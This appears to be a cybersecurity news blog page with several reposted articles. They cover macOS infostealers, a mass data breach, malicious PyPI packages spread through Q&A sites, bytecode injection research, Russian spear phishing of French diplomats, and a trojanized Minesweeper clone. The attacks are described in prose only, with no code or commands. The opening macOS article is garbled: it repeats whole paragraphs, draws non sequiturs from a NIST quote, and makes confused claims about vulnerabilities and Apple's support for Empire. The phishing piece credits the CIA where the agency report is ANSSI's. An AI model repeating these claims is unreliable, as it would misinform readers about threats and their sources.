A new report published by Intel471 reveals that macOS is increasingly being targeted by threats developing malware specific to the operating system or using cross-platform languages to achieve their goals on macOS computers through malware being developed for Mac operating systems. It is also widely reported that macOS contains more vulnerabilities than other operating systems. There are many ways in which malware and exploits can be used to commit cybercrime and spy on individuals and businesses. 

According to a new report covering the subject, new research shows that macOS vulnerabilities exploited in 2023 increased by more than 30% compared to 2022. Many issues should be addressed as part of the Software Vulnerability Ratings Report 2024 issued by the patch management software company Action1. These include the fact that Microsoft Office programs are becoming easier to exploit and that attackers are increasingly attacking load balancers such as NGINX and Citrix.

According to Action1 analysts, it was possible to gain five insights into the threat landscape between 2022 and 2023 based on data available in both the National Vulnerability Database and CVEdetails.com. This NVD has seen a significant slowdown in the maintenance activity since February, as a large backlog of software and hardware flaws has been submitted to the National Institute of Standards and Technology, which is causing a decline in the number of maintenance activities. 

The NIST has said that the reason for the slowdown is that "the amount of software has increased and, therefore, so has the number of vulnerabilities as well as interagency support has changed.". As a result, they observed that between January 2023 and July 2024, more than 40 malicious actors attacked macOS systems with a variety of malware types, most commonly infostealers and trojans, which were one of the most popular threats. 

In recent years, information theft malware – also known as info stealers – has become increasingly popular and widespread across all operating systems. MacOS, of course, is not exempt from this trend. It has been reported by the cloud security company Uptycs that incidents involving info thieves have doubled in the first quarter of 2023 when compared to the same period of last year. Additionally, cyber security company Group-IB reported that underground sales of macOS infostealers have increased by five times in the last five years. 

Several types of software are utilized by cybercriminals. They use software to steal log-in credentials, session cookies that enable authentication without credentials, and even more sensitive information such as credit card information or cryptocurrency wallet addresses. A lot of companies have also started using this software to acquire legitimate credentials, which are then sold to other criminals, most of whom are buying them from companies instead of individuals. Atomic Stealer, which is also referred to as Atomic MacOS Stealer, or AMOS, has been one of the most popular MacOS data-stealing applications since 2023. 

There is a new security vulnerability in macOS devices and browsers that is designed to steal credentials and cryptocurrency wallet data from them. In addition, there are several other infostealers targeted at macOS that are being operated by cybercriminals or advertised. An anonymous threat actor nicknamed Code Hex advertised a Mac OS info thief known as ShadowVault, which can steal data from multiple Chrome-based browsers, files stored on compromised computers, as well as Bitcoin wallets by stealing information from their data storage. 

The fact that so many spyware providers have sold their services to state-sponsored threat actors in recent years does not mean that all threat actors do not develop malware and tools aimed at macOS as well. Among other threats, the North Korean threat actor BlueNoroff has developed a malware loader known as RustBucket that has been developed specifically for macOS, and which targets financial institutions that are involved in cryptocurrency-related activities. 

In the past, Russian threat actors became known for their use of macOS malware with the attack response team they formed, called APT28, which is part of the Russian General Staff of the Armed Forces, as well as APT29, another part of the Russian Foreign Intelligence Service. In APT29, the Empire cross-platform remote administration and post-exploitation framework was used, which, although no longer supported by Apple, did permit the use of macOS as a target. 

Among other things, the threat actor APT32, based in Vietnam, also released a macOS backdoor that was used to target different organization types. Furthermore, the perception that macOS has a lower amount of malware specific to it than Windows can further support this perception, as there is a relatively lower amount of macOS-specific malware available in comparison to Windows. Among the threat actors identified in the report, more than 40 are actively targeting macOS, with more than 20 actively trying to acquire malicious software crafted specifically for macOS. 

There are several ways in which this happens, including the purchase of pre-existing malware as well as commissioning the creation of new malware. The recent focus on info thieves, which steal sensitive data such as login credentials, session cookies, and credit card numbers, highlights that there is an immediate threat to consumers and businesses alike from these sorts of hackers. In addition to this, independent research also confirms the trend. The renowned security researcher Patrick Wardle reported in 2023 that there were twice as many macOS malicious programs compared to last year based on his observations. 

Similarly,        While different spyware providers have sold their services to state-sponsored threat actors, some of these threat actors do develop malware and tools aimed at macOS. North Korean threat actor BlueNoroff, for example, has developed a malicious loader known as RustBucket, developed for macOS and aimed at targeting financial institutions whose activities are related to cryptocurrencies. 

Russian threat actors APT28, part of the Russian Main Directorate of the General Staff of the Armed Forces, and APT29, part of Russia's Foreign Intelligence Service, have also used macOS malware. APT29 used the no-longer-supported Empire cross-platform remote administration and post-exploitation framework, enabling targeting of macOS. Vietnam-based threat actor APT32 also deployed a macOS backdoor used for targeting different organizations. The perception is further reinforced by the relatively smaller amount of macOS-specific malware compared to Windows, which can make it seem like an easier target. 

The report reveals that over 40 threat actors are actively engaged in targeting macOS, with more than 20 actively seeking to acquire malware specifically designed for the platform, including both the purchase of pre-existing malware and the commissioning of new malware development. The focus on info stealers, which steal sensitive data like login credentials, session cookies, and credit card information, highlights the immediate threat to individual users and businesses alike. The trend is further supported by independent research. 

Patrick Wardle, a renowned security researcher, observed a doubling of new macOS malware in 2023 compared to the previous year. Similarly, Group-IB, a cybersecurity firm, reported a fivefold increase in underground sales related to macOS infostealers. In the short term, infostealers and RATs are expected to remain the most prevalent threats to macOS users. However, the increasing presence of ransomware and other malware families suggests a growing sophistication and diversification of threats. 

The trend, coupled with the increasing number of threat actors targeting macOS, calls for heightened vigilance and proactive security measures. The report concludes with a stark warning: despite the perceived security of Apple products, macOS users should remain vigilant against various threats. The growing sophistication of malware and the increasing number of threat actors seeking to exploit vulnerabilities in the macOS ecosystem underscores the need for robust security measures, including the use of reputable antivirus software, regular software updates, and strong passwords. macOS systems must always be up to date and patched to avoid being affected by common security vulnerabilities. 

Security software should be deployed on systems to detect malware and suspicious activity. Email security solutions should also be used, as many initial breaches are spread via phishing emails. Finally, all employees need to be trained to spot potential social engineering techniques used in emails or instant messaging tools.
Read more »
USDoD
Data Breach Data Leak DOD Hackers Information Security Sensitive data Social Security Number USA USDoD

Massive Data Breach Exposes Social Security Numbers of 2.9 Billion People

 


A significant data breach has reportedly compromised the personal information of 2.9 billion people, potentially affecting the majority of Americans. A hacking group known as USDoD claims to have stolen this data, which includes highly sensitive information such as Social Security numbers, full names, addresses, dates of birth, and phone numbers. This development has raised alarm due to the vast scope of the breach and the critical nature of the information involved. The breach was first reported by the Los Angeles Times, which revealed that the hacker group is offering the stolen data for sale. 

The breach allegedly stems from National Public Data, a company that collects and stores personal information to facilitate background checks. The company has not formally confirmed the breach but did acknowledge purging its entire database. According to National Public Data, they have deleted all non-public information, although they stopped short of admitting that the data had been compromised. In April, the hacking group USDoD claimed responsibility for the breach, stating that it had obtained the personal information of billions of people. This led to a class-action lawsuit against National Public Data, as victims sought redress for the potential misuse of their sensitive information. 

The lawsuit has intensified scrutiny on the company’s data security practices, particularly given the critical nature of the information it manages. The potential consequences of this breach are severe. The stolen data, which includes Social Security numbers, could be used for a variety of malicious activities, including identity theft, fraud, and other forms of cybercrime. The scale of the breach also highlights the ongoing challenges in safeguarding personal information, particularly when it is collected and stored by third-party companies. As investigations continue, the breach underscores the urgent need for stronger data protection measures. 

Companies that handle sensitive information must ensure that they have robust security protocols in place to prevent such incidents. The breach also raises questions about the transparency and responsibility of organizations when dealing with personal data. In the meantime, consumers and businesses are on high alert, awaiting further developments and the potential fallout from one of the largest data breaches in history. The incident serves as a stark reminder of the risks associated with data storage and the critical importance of cybersecurity.
Read more »
Python security
Cybersecurity developer Q&A platform Hackers malicious Python packages malware Malware Distribution Python security

Hackers Spreading Malicious Python Packages Through Popular Developer Q&A Platform

 

The malware hidden within the package functioned as a comprehensive information stealer, targeting a wide range of data. This included web browser passwords, cookies, credit card details, cryptocurrency wallets, and information from messaging apps like Telegram, Signal, and Session.

Additionally, it had features to capture screenshots and search for files containing GitHub recovery codes and BitLocker keys. The collected information was then compressed and sent to two Telegram bots controlled by the attacker.

The malware also included a backdoor component, giving the attacker persistent remote access to the victims' machines, enabling further exploits and long-term control.

The attack chain involved multiple stages, with the "raydium" package listing "spl-types" as a dependency to disguise its malicious behavior and appear legitimate to users.

A notable aspect of this campaign was the use of Stack Exchange as a vector for distribution. The attacker posted seemingly helpful answers to developer questions about performing swap transactions in Raydium using Python, referencing the malicious package. By choosing high-visibility threads with thousands of views, the attacker maximized the package's reach and credibility.

Although the original Stack Exchange post has been removed, The Hacker News found references to "raydium" in an unanswered question posted on July 9, 2024, where a user struggled to run a swap on the Solana network using Python 3.10.2 with Raydium. Additionally, "raydium-sdk" was mentioned in a Medium post titled "How to Buy and Sell Tokens on Raydium using Python: A Step-by-Step Solana Guide" by a user named SolanaScribe on June 29, 2024.

The exact removal date of these packages from PyPI is unclear. Users have recently sought help on the Medium post about installing "raydium-sdk" as late as July 27, 2024. Checkmarx confirmed that the Medium post was not created by the threat actor.

This method of malware distribution is not new. In May, Sonatype exposed a similar scheme where the package pytoileur was promoted on Stack Overflow to facilitate cryptocurrency theft. This trend demonstrates how attackers exploit the trust in community-driven platforms to conduct large-scale supply chain attacks.

"A single compromised developer can inadvertently introduce vulnerabilities into an entire company's software ecosystem, potentially affecting the whole corporate network," the researchers stated. "This attack is a wake-up call for individuals and organizations to reassess their security strategies."

In a related development, Fortinet FortiGuard Labs reported on a malicious PyPI package named zlibxjson, designed to steal sensitive information such as Discord tokens, browser cookies from Chrome, Firefox, Brave, and Opera, and stored passwords. This package had 602 downloads before it was removed from PyPI.

"These actions can lead to unauthorized access to user accounts and the exfiltration of personal data, clearly classifying the software as malicious," said security researcher Jenna Wang.
Read more »
Vulnerabilities and Exploits
Data Safety data security Hackers Safety Vulnerabilities and Exploits

Hackers Exploit Bytecode Interpreters to Inject Malicious Code

 

Attackers can conceal their efforts to execute malicious code by embedding commands into the machine code stored in memory by software interpreters used in many programming languages, such as VBScript and Python. This technique will be demonstrated by a group of Japanese researchers at next week's Black Hat USA conference.

Interpreters convert human-readable software code into bytecode, which are detailed programming instructions that the underlying virtual machine can understand. The research team managed to insert malicious instructions into the bytecode held in memory before execution. Since most security software does not scan bytecode, their changes went undetected. 

This method could enable attackers to hide their malicious activities from most endpoint security software. Researchers from NTT Security Holdings Corp. and the University of Tokyo will showcase this capability using the VBScript interpreter, says Toshinori Usui, a research scientist at NTT Security. The researchers have confirmed that the technique also works for inserting malicious code into the in-memory processes of both the Python and Lua interpreters.

"Malware often hides its behavior by injecting malicious code into benign processes, but existing injection-type attacks have characteristic behaviors ... which are easily detected by security products," Usui says. "The interpreter does not care about overwriting by a remote process, so we can easily replace generated bytecode with our malicious code — it's that feature we exploit."

While bytecode attacks are not entirely new, they are relatively novel. In 2018, researchers from the University of California at Irvine published a paper introducing bytecode attacks and defenses. Last year, the administrators of the Python Package Index (PyPI) removed a malicious package known as fshec2, which escaped initial detection because its malicious code was compiled as bytecode. Python compiles its bytecode into PYC files, which the Python interpreter can execute.

"This may be the first supply chain attack to leverage the fact that Python bytecode (PYC) files can be directly executed, and it comes amid a spike in malicious submissions to the Python Package Index," Karlo Zanki, a reverse engineer at ReversingLabs, said in a June 2023 analysis of the incident. "If so, it poses yet another supply chain risk going forward, since this type of attack is likely to be missed by most security tools, which only scan Python source code (PY) files."

Beyond Precompiled Malware

After an initial compromise, attackers have several options to extend their control over a targeted system: They can perform reconnaissance, attempt further system compromise using malware, or use existing tools on the system — a strategy known as "living off the land."

The NTT researchers' bytecode attack technique falls into the latter category. Instead of using pre-compiled bytecode files, their attack — called Bytecode Jiu-Jitsu — involves injecting malicious bytecode into the memory space of a running interpreter. Since most security tools do not inspect bytecode in memory, the attack can conceal the malicious commands from detection.

This approach allows attackers to bypass other more obviously malicious steps, such as calling suspicious APIs to create threads, allocating executable memory, and modifying instruction pointers, Usui explains.

"While native code has instructions directly executed by the CPU, bytecode is just data to the CPU and is interpreted and executed by the interpreter," he says. "Therefore, unlike native code, bytecode does not require execution privilege, [and our technique] does not need to prepare a memory region with execution privilege."

Improving Interpreter Defenses

Interpreter developers, security tool developers, and operating system architects can all help mitigate this problem. Although bytecode attacks do not exploit vulnerabilities in interpreters, but rather their method of code execution, certain security measures like pointer checksums could reduce the risk, according to the UC Irvine paper.

The NTT Security researchers noted that checksum defenses would likely be ineffective against their techniques and recommend that developers enforce written protections to mitigate the risk. "The ultimate countermeasure is to restrict the memory write to the interpreter," Usui says.

Presenting a new attack technique aims to show security researchers and defenders what could be possible, not to inform attackers' strategies, Usui emphasizes. "Our goal is not to abuse defensive tactics, but to ultimately be an alarm bell for security researchers around the world," he says.
Read more »
Spear Phishing
Cyber Crime cyber espionage Hackers Russia Spear Phishing

Inside the Espionage: How Nobelium Targets French Diplomatic Staff


Cybersecurity threats have become increasingly sophisticated, and state-sponsored actors continue to target government institutions and diplomatic entities. One such incident involves a Russian threat actor known as “Nobelium,” which has been launching spear phishing attacks against French diplomats.

ANSSI Issued an Alert

France's cybersecurity agency, ANSSI, has issued a notice outlining a Russian spear phishing attempt aimed at French diplomats, the Record writes. The CIA connects the campaign to "Nobelium," a threat actor linked to Russia's Foreign Intelligence Service (SVR).

The Campaign

Nobelium, believed to have ties to Russia’s Foreign Intelligence Service (the SVR), primarily uses compromised legitimate email accounts belonging to diplomatic staff to conduct these attacks. The goal is to exfiltrate valuable intelligence and gain insights into French diplomatic activities.

Compromising Email Accounts of French Ministers

These events included the penetration of email accounts at the French Ministry of Culture and the National Agency for Territorial Cohesion, but according to ANSSI, the hackers were unable to access any elements of those networks other than the compromised inboxes.

However, the hackers subsequently used those email addresses to target other organizations, including France's Ministry of Foreign Affairs. ANSSI stated that Nobelium attempted to acquire remote access to the network by installing Cobalt Strike, a penetration testing system infamous for being abused by bad actors, but was unsuccessful.

Other occurrences reported by ANSSI included the use of a French diplomat's stolen email account to send a malicious message falsely proclaiming the closure of the French Embassy in South Africa due to an alleged terror assault.

Tactics and Techniques

Nobelium’s spear phishing campaigns are highly targeted. They craft convincing lure documents tailored to specific individuals within diplomatic institutions, embassies, and consulates. Here are some tactics and techniques they employ:

Email Spoofing: Nobelium impersonates trusted senders, often using official-looking email addresses. This makes it challenging for recipients to discern the malicious intent.

Lure Documents: The threat actor attaches seemingly innocuous files (such as PDFs or Word documents) to their emails. These files contain hidden malware or exploit vulnerabilities in software applications.

Social Engineering: Nobelium leverages social engineering techniques to manipulate recipients into opening the attachments. They might use urgent language, reference official matters, or create a sense of curiosity.

Credential Harvesting: Once the recipient opens the attachment, the malware may attempt to steal login credentials or gain unauthorized access to sensitive systems.

Read more »
IT Infrastructure
Australia Australian Businesses Cyberattack cybercriminals Data Breach Fortinet Hacker attack Hackers IT Infrastructure

The Growing Threat of Data Breaches to Australian Businesses

 

Data breaches are now a significant threat to Australian businesses, posing the risk of "irreversible brand damage." A cybersecurity expert from Fortinet, a global leader in the field, has raised alarms about cybercriminals increasingly targeting the nation’s critical infrastructure. Cybercriminals are continually finding new ways to infiltrate Australia’s infrastructure, making businesses highly vulnerable to attacks. 

The Australian federal government has identified 11 critical sectors under the Security of Critical Infrastructure Act, which was amended in 2018 to enforce stricter regulations. Businesses in these sectors are required to complete annual reporting to notify the federal government of any attempts to access their networks. Michael Murphy, Fortinet’s Head of Operational Technology and Critical Infrastructure, recently discussed the severity of cyber threats on Sky News Business Weekend. During the 2022-2023 financial year, 188 cybersecurity incidents were reported across critical sectors, highlighting ongoing risks to national networks like water and energy supplies. 

Additionally, the Australian Bureau of Statistics found that 34 percent of businesses experienced resource losses managing cybersecurity attacks in the 2021-2022 financial year, and 22 percent of Australian businesses faced a cybersecurity attack during that period—more than double the previous year’s figure. Even small businesses are now vulnerable to cybercrime. Murphy pointed out that among entities with mandatory reporting, 188 incidents were reported, with 142 incidents reported by entities outside of critical infrastructure, demonstrating the widespread nature of the threat. He explained that hackers are motivated by various factors beyond financial gain, including the desire for control. 

The consequences of cyber attacks can be severe, disrupting systems and causing significant downtime, which leads to revenue loss and irreversible brand damage. Critical infrastructure sectors face unique challenges compared to the IT enterprise. Quick restoration of systems is often not an option, and recovery can take considerable time. This extended downtime not only affects revenue but also damages the reputation and trustworthiness of the affected organizations. Murphy noted that many incidents are driven by motives such as financial profiteering, socio-political influence, or simply the desire of hackers and syndicates to boost their credibility. 

As cyber threats evolve, it is crucial for businesses, especially those in critical infrastructure sectors, to strengthen their cybersecurity measures. While annual reporting and adherence to federal regulations are essential, proactive strategies and advanced security technologies are necessary to mitigate risks effectively.
Read more »
US
Cyber Security Europe financial organizations Hackers malicious scripts Minesweeper game Python clone US

Hackers Use Trojanized Minesweeper Clone to Phish Financial Organizations

 

Hackers are exploiting code from a Python clone of Microsoft's classic Minesweeper game to conceal malicious scripts in attacks targeting financial institutions in Europe and the US.

Ukraine's CSIRT-NBU and CERT-UA have identified the threat actor 'UAC-0188' as responsible for these attacks. They are using the legitimate game code to hide Python scripts that download and install the SuperOps RMM (Remote Monitoring and Management) software. SuperOps RMM, though legitimate, provides remote actors with direct access to compromised systems.

CERT-UA's investigation into the initial discovery has uncovered at least five breaches in financial and insurance sectors across Europe and the United States linked to these same files.

The attack initiates with an email from "support@patient-docs-mail.com," posing as a medical center with the subject "Personal Web Archive of Medical Documents." The email prompts recipients to download a 33MB .SCR file from a Dropbox link. This file includes harmless code from a Python clone of Minesweeper, alongside malicious Python code designed to download additional scripts from a remote source, "anotepad.com."

Incorporating Minesweeper code within the executable helps disguise the 28MB base64-encoded string containing the malicious code, making it seem benign to security software. The Minesweeper code features a function named "create_license_ver," repurposed to decode and execute the hidden malicious code, using legitimate software components to mask and facilitate the attack.

The base64 string decodes to a ZIP file containing an MSI installer for SuperOps RMM, which is extracted and executed using a static password. While SuperOps RMM is a legitimate tool, in this scenario, it grants attackers unauthorized access to the victim's computer.

CERT-UA advises organizations not using SuperOps RMM to treat its presence or related network activity, such as connections to "superops.com" or "superops.ai" domains, as indicators of a compromise.

The agency has also provided additional indicators of compromise (IoCs) associated with this attack at the end of their report.
Read more »
Subscribe to: Posts (Atom)